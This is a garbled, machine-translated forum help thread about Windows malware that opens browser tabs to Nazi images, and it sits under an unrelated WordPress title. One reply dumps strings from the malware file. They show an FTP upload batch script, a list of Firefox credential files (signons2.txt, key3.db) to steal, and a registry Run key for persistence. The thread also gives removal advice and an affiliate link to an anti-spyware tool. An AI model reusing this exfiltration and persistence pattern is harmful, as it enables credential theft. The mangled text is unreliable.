Installing WordPress On Windows

Help! I have a website that keeps the load - 100 of eyelashes?
My browser keeps trying to reload a web page, opening 100 of the tabs in IE or Opera or whatever I set my default browser. The page http://charlesblake.files.wordpress.com/2007/10/hitler.jpg. This locks me completely to do anything on my computer - as soon as open any program, up pops the browser tries to access the page again. As you can imagine, this is driving me crazy. I have Windows Live OneCare installed and running, and when I run a virus check the manual appears. Very grateful for any suggestions! With Cragless response. I've been running Spyware Doctor (free download) and seems to have found the problem. If you can find the problem, why not OneCare? I downlaod DCP of PCTools (http://www.pctools.com/spyware-doctor/?ref=afl_nenextech) - if you try it, let me know how it goes. It takes ages to scan the first time! Thanks again, "Cragless"!
Ok .. I had the same problem .... And just to confirm the file by that: C: Windows System32 nvdai.exe in this file contains the following strings (in background): englisch C: Documents and Settings *.* C: Documents and Settings deutsch C: Dokumente und Einstellungen *.* C: Dokumente und Einstellungen ¤ BP @ T ftpcmd.dat />> ftpcmd.dat echo bin>> echo ftpcmd.dat put% 1>> echo quit ftpcmd.dat Smoking>> ftpcmd.dat ftp-ns: ftpcmd.dat>> ftpcmd.dat echo cd />> echo mkdir ftpcmd.dat> ftpcmd.dat echo @ echo off echo user C: Windows Nvdai.bat Application Data Mozilla Firefox Profiles Application Data Mozilla Firefox Profiles *.* "" C: Windows nvdai.bat "signons2.txt key3.db cert8.db Anwendungsdaten Mozilla Firefox Profiles Anwendungsdaten Mozilla Firefox Profiles *.* reg add "HKEY_LOCAL_MACHINE SOFTWARE Microsoft Windows CurrentVersion Run "/ v" nvdai "/ t REG_SZ / d" C: Windows System32 nvdai.exe "/ f C: Windows System32 nvdai.exe start start http://robert.thegeakes.co.uk/images/wallpapers/swastika-bangon.jpg http://www.stefanjacob.de/Geschichte/Bilder/Grossformate/Hakenkreuz.jpg Start http://aktualne.centrum.sk/soumar/img/36/14/361442-svastika.jpg www.o4os.ce.edus.si/gradiva/geo/azija/foto/svastika3.jpg start http:// Start http://www.interet-general.info/IMG/Rudolf-Hess-1.jpg Start http://www.earthstation1.com/WWIIPics/Germany/HeinrichHimmlerSalutesSS.jpg http://www.owlnet.rice start. edu / ~ rar4619/Images/Goebbels.jpg / home http://charlesblake.files.wordpress.com/2007/10/hitler.jpg It seems pretty obvious ... To begin, remove the file (nvdai.exe) from the current location and just to be safe, delete the registry key: [HKEY_LOCAL_MACHINE SOFTWARE Microsoft Windows CurrentVersion Run] This thing went right through ....
